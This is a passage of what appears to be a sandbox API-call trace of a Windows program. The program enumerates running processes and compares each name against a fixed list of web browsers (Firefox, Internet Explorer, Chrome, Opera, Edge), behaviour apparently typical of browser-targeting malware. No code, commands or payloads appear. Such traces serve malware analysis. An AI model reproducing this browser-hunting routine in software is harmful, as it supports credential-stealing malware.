Process]", lpString2="opera.exe") returned -1 [0181.111] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0181.111] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0181.112] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0181.112] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0181.112] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0181.112] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0181.112] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0181.112] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0181.112] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0181.112] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0181.112] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0181.112] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0181.112] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.112] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0181.113] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0181.113] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0181.113] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0181.113] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0181.113] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.113] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0181.114] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0181.114] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0181.114] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0181.114] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0181.114] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.114] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0181.114] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0181.114] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0181.114] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0181.114] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0181.114] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.114] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0181.115] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0181.115] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0181.115] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0181.115] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0181.115] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.115] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0181.115] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0181.115] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0181.115] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0181.115] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0181.115] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.115] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0181.116] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0181.116] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0181.116] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0181.116] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0181.116] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.116] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0181.117] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0181.117] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0181.117] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0181.117] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0181.117] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.117] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.117] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.117] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.117] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.117] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0181.117] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.117] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.118] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.118] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.118] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.118] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0181.118] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.118] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.118] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.118] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.118] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.118] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0181.118] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.118] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.119] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.119] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.119] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.119] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0181.119] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.119] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.119] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.120] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.120] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.120] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0181.120] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.120] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0181.120] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0181.120] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0181.120] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0181.120] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0181.120] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.120] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.121] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.121] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.121] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.121] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0181.121] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.121] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.121] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.121] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.121] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.121] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0181.121] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.121] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0181.122] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0181.122] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0181.122] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0181.122] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0181.122] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.122] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0181.122] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0181.123] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0181.123] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0181.123] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0181.123] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.123] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0181.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0181.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0181.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0181.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0181.123] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.123] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.124] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.124] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.124] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.124] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0181.124] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.124] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0181.124] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0181.124] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0181.124] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0181.124] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0181.124] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.124] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0181.125] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0181.125] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0181.125] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0181.125] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0181.125] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.125] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0181.126] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0181.126] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0181.126] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0181.126] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0181.126] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.126] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0181.126] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0181.126] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0181.126] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0181.126] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0181.126] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.126] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0181.127] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0181.127] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0181.127] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0181.127] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0181.127] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.127] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0181.127] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0181.127] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0181.127] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0181.127] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0181.127] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.127] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0181.128] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0181.128] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0181.128] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0181.128] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0181.128] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.128] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0181.129] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0181.129] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0181.129] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0181.129] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0181.129] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.129] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0181.129] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0181.129] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0181.129] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0181.129] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0181.129] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.129] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0181.130] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0181.130] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0181.130] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0181.130] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0181.130] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.130] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0181.130] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0181.130] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0181.130] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0181.130] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0181.130] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.130] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0181.131] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0181.131] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0181.131] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0181.131] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0181.131] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.131] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0181.131] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0181.131] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0181.131] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0181.131] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0181.132] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.132] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0181.132] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0181.132] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0181.132] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0181.132] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0181.132] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.132] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0181.133] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0181.133] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0181.133] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0181.133] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0181.133] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.133] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0181.133] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0181.133] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0181.133] lstrcmpiA (lpString1="wooden.exe", 